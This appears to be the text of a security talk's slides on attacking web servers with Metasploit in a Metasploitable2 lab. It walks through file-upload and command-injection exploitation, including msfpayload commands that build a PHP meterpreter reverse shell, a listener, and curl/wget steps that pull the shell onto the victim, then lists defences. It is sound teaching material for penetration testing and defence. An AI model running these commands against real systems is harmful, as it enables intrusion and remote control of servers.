Dennis
Application Security Specialist WhiteHat Security Full-Time Student University of Houston – Main Campus ▪ Computer Information Systems Major Twitter Website / Blog KernelMeltdown.org
Kali Linux – Our attacker machine Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim. Metasploitable2 – Victim Web Server
Exploiting the backend server through a web application.
Reasons why hackers want to compromise the server: Run attacks against the internal network Use the server as a bot Install backdoors onto the server Reveal sensitive files/passwords Execute any local file Execute remote files and more…
Vulnerabilities that are dangerous against a server Directory Traversal Local File Inclusion Remote File Inclusion Remote Code Execution SQL Injection Command Injection
Metasploit is an open-source framework used for Security development and testing Information gathering and fingerprinting Exploitation/Penetration testing Payload generation and encoding Fuzzing And much more…
Command Line Interfaces msfconsole msfcli GUI Interfaces Metasploit Community Edition Armitage
Modules Exploit – Exploitation/Proof-of-Concept code ▪ Ruby on Rails exploit ▪ PHP-CGI exploit Auxiliary – Misc. modules for multiple purposes ▪ Scanners ▪ DDOS tools ▪ Fingerprinting ▪ Clients Payloads – Code to be executed on the exploited system ▪ System Shells ▪ Meterpreter Shells Post – Modules for post-exploitation tasks ▪ Persistence ▪ Password Stealing ▪ Pivoting
Active Exploits Actively exploit a host. Ex: Ruby on Rails XML exploit Passive Exploits Wait’s for incoming hosts, then exploits them Ex: Java 0-days Exploits contain payloads
Inline (Non Staged) Payload containing the exploit and shell code Stable Large size Staged Exploits victim, establishes connection with attacker, pulls down the payload Meterpreter Advanced, dynamic payload. Extended over the network Extensible through modules and plugins
Types of connections Bind ▪ Local server gets started on victim machine ▪ Attacker connects to victim ▪ windows/x64/shell/bind_tcp Reverse ▪ Local server gets started on attacker machine ▪ Victim connects to attacker ▪ windows/x64/shell/reverse_tcp
CVE DOS attack ▪ -T Source code disclosure ▪ -s argument Remote Code Execution ▪ -d argument
CVE Easy to find, easy to exploit, critical vulnerability. Requires just one POST request containing a specially crafted XML data. Send commands through YAML objects
The upload functionality allows for any file type to be uploaded 1. Upload server-side code and check if it executes ▪ PHP = ▪ ASP = ▪ JSP = 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Upload the shell and execute it
Allows an attacker to execute system level commands. 1. Attempt a safe command 1.echo test 2.uname -a 2. Use msfpayload to create a shell 3. Use msfcli to listen for a connection from the victim 4. Inject curl or wget commands to download the shell onto the victim machine. 5. Chmod if necessary and execute
msfpayload php/meterpreter/reverse_tcp O msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=1337 O msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=1337 R > shell.php # Now edit the shell.php file to remove the comment on the first line and add "?>" at the end of the file. ================================== msfcli multi/handler payload=php/meterpreter/reverse_tcp lhost= lport=1337 E
Keep software up to date! PHP: 5.4.3, Ruby on Rails: , , , Use whitelisting for file upload extensions Watch for extensions and content-types Don’t let upload directory be executable Rename files if possible Don’t pass user input as a system command! Use library calls when possible Sanitize input
BackTrack-Linux The Metasploit Project Metasploit Unleashed PHP-CGI Advisory Ruby on Rails Exploitation metasploit-cve metasploit-cve Damn Vulnerable Web Application (DVWA) Metasploitable 2